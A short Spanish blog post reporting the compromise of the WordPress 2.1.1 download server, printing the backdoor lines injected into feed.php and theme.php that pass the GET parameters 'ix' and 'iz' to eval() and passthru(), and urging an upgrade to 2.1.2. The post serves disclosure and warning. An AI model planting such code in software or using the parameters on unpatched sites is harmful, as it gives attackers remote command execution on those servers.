WordPress 2.1.1 Comprometido

Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2

El codigo injectado esta en estos dos ficheros:

  • wp-includes/feed.php
    84
    85
    86
    
    function comment_text_phpfilter($filterdata) {
        eval($filterdata);
    }
    149
    
    if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
  • wp-includes/theme.php
    408
    409
    410
    
    function get_theme_mcommand($mcds) {
      passthru($mcds);
    }
    441
    
    if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

Leave a Reply